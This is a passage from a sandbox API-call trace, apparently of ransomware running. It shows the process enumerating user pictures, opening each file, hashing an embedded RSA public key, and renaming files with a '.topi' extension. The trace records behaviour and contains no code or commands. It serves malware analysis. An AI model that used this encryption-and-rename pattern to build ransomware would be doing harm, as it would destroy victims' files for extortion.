dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.524] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.525] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.525] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.525] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xfe99, lpOverlapped=0x0) returned 1 [0095.525] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.525] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.526] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.526] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.526] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.527] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.527] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.527] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.527] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.527] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.527] GetLastError () returned 0x0 [0095.527] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.527] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.528] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.528] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.528] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.528] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.528] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfea0) returned 0x9a06a00 [0095.529] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.529] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1d58 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94e0 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1da0 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94f8 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9528 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.529] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9540 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.530] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9528 | out: hHeap=0x680000) returned 1 [0095.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9540 | out: hHeap=0x680000) returned 1 [0095.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.530] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9540 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9528 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.530] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9540 | out: hHeap=0x680000) returned 1 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9528 | out: hHeap=0x680000) returned 1 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.531] GetCurrentThreadId () returned 0x8c4 [0095.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f64f0 [0095.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.531] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.531] GetCurrentThreadId () returned 0x8c4 [0095.531] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.532] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.532] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9528 [0095.533] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.533] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.533] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.534] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.534] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.534] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9540 [0095.534] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.534] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.534] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.534] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9510 [0095.534] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.534] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.534] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.534] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.534] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.535] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\i0_91MD8mP.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\i0_91md8mp.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\i0_91MD8mP.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\i0_91md8mp.gif.topi")) returned 1 [0095.536] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.536] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.536] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.538] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeef2810, ftCreationTime.dwHighDateTime=0x1d5b69b, ftLastAccessTime.dwLowDateTime=0xd4d9780, ftLastAccessTime.dwHighDateTime=0x1d5c0ff, ftLastWriteTime.dwLowDateTime=0xd4d9780, ftLastWriteTime.dwHighDateTime=0x1d5c0ff, nFileSizeHigh=0x0, nFileSizeLow=0x18d8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ifqNKr.png", cAlternateFileName="")) returned 1 [0095.538] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ifqNKr.png") returned=".png" [0095.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ifqNKr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ifqnkr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.538] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=101774) returned 1 [0095.538] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.542] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18d68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.543] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.545] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.546] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.547] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.547] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.547] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.547] GetLastError () returned 0x0 [0095.547] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.547] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.547] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.547] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.547] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.547] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.548] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.548] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.548] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.548] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18d90) returned 0x9a06a00 [0095.548] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.548] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1da0 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94f8 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1de8 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9510 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9540 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9558 [0095.549] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.550] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9540 | out: hHeap=0x680000) returned 1 [0095.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9558 | out: hHeap=0x680000) returned 1 [0095.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.550] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0095.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9558 [0095.550] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9540 [0095.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0095.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.551] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9558 | out: hHeap=0x680000) returned 1 [0095.551] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9540 | out: hHeap=0x680000) returned 1 [0095.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.552] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.552] GetCurrentThreadId () returned 0x8c4 [0095.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6580 [0095.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.552] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.553] GetCurrentThreadId () returned 0x8c4 [0095.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.553] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.553] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.554] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.554] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 